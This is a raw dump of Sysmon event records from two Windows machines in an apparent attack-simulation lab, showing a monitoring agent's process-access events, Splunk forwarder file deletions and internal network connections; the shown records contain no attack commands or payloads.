12:29:42.656{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018632Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.646{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018631Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.617{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 23542300x800000000000000018630Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.609{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46042D933A3588E48132E49C53AC702C,SHA256=7E8FD1D3C129A0721C8FE17AD6A45CAB012FCC179E922A01FB4C3B69E6C4C1DE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018629Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.605{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018628Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.596{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018627Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.582{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018626Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.573{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018625Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.561{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018624Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.551{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018623Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.545{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000046402Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:42.935{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046401Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:42.935{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046400Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:42.935{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000046399Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:42.327{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6B86701B7E7BD0311EF48F815EBA791,SHA256=97B682ECBC08182D34F756AC57056080908BEBCD45B0570F4D83C12A95BEE35C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046403Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:43.421{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5950F917BB8D9EEDC1D51017F8F4C4AC,SHA256=BB3D18056444C6A01547B1DFE7E414E8F2B8AF1023D45C07401B396075E0AEA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046404Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:44.516{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=530211E4A54CB0110E88B7E63D4F6E16,SHA256=B6E7C5E702F907AC5CB8F9E5CF46474F30770684C2F892CF8DE5F096D2E043F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018655Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:44.077{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36E408648E99FA7E18915C357FA0F55E,SHA256=A72018AAA79787901165E2E830372098DCAA0F442DE8D9CACF3DDB4C25ED1F37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046406Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:45.599{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ECBBDC04AE6B5BD1E60A83E7456FA0E,SHA256=FCA8E145E491ABF8E4B55C8B2C8E0C2DDBEC376D29FFC75248FADE1E45F31802,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018656Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:45.121{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D36CE957F7677E9628D69B2524DEFD90,SHA256=0FB28FAA43447BCE4B73A3505497DAB7850223BC0427CBC95D404B2ACB6BFCC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046405Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:45.506{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A878FECD91FE92C9AF47F5E4F2B0C408,SHA256=F8C386BB45EA310C14939BE1F0C5049DBEDB231FB60FFDEC45EC983B7D1B7A7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046407Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:46.698{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5D966D126C694D42356A3486591DD6A,SHA256=099B981166EE04030B392C328C8C89F4A10C0B3F7ACCE311DEF4B7F0EDBCF879,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018657Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:46.215{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=454082507AE007BC1741646914BD3B1E,SHA256=D3E82CDC113BF4DFF5F8B94B2FCEC1937E5B998B68E35C84083E47EA57ED9BAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046409Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:47.798{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C5DD29101BD539399555ACF39116937,SHA256=3DF95F364ACECA799033EDD31E8779CF8E669361A6AC3D8E3910D48659E14DEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018659Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:47.297{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72BE8647F121192DEBCA5881F61D0E45,SHA256=BE2A9F3FA3A4FCBAB710D3A0BA5E97FCDCC7867AD967452228A2AEFE1F04AE9F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000046408Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:44.569{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56467-false10.0.1.12-8000- 354300x800000000000000018658Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:44.948{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50187-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000046410Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:48.885{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EF1C43953908E29CD863AFE06FC100D,SHA256=99CA16500A31ED5C8DEB60403769C2570641B64A57785EB20F7FA40343E2FAF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018660Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:48.377{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01601F3499F4F63AC9F5C649913B54BA,SHA256=4A71B0B2BBB2DD85BF36CCC3716D4F74B5129B1BA63A5C49E4C24AA9B1510C69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046411Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:49.968{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12EA49CBAA57384D30BF8CD4A136C1B2,SHA256=F582CB8CE2DB444ED9BC6A01103329CCCDF254E3DC84DBD74F046156CA935FE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018661Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:49.474{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67AE0740F9CAB522DAAC386EEC524597,SHA256=7438672D907EB02EC7969E2956ED6F1D6D092B08E1834A60CB5DF5B5DFFCDB5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018662Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:50.553{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2425A0E8FB096F2317CB06FB481628F4,SHA256=C7D8016374B156F49CE42781E66CA1EE9E44E1C8EE1008A3EB8126824FD8ECFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018663Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:51.645{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF0AB8F541E124E9A11ACDBA26F53C13,SHA256=14971CD6A08EB0D4446F53DE8CF270A89780DBD4AB914CA0D5CFE243A1D154E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.891{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.890{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046434Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.884{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046433Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.883{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046432Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.880{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046431Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 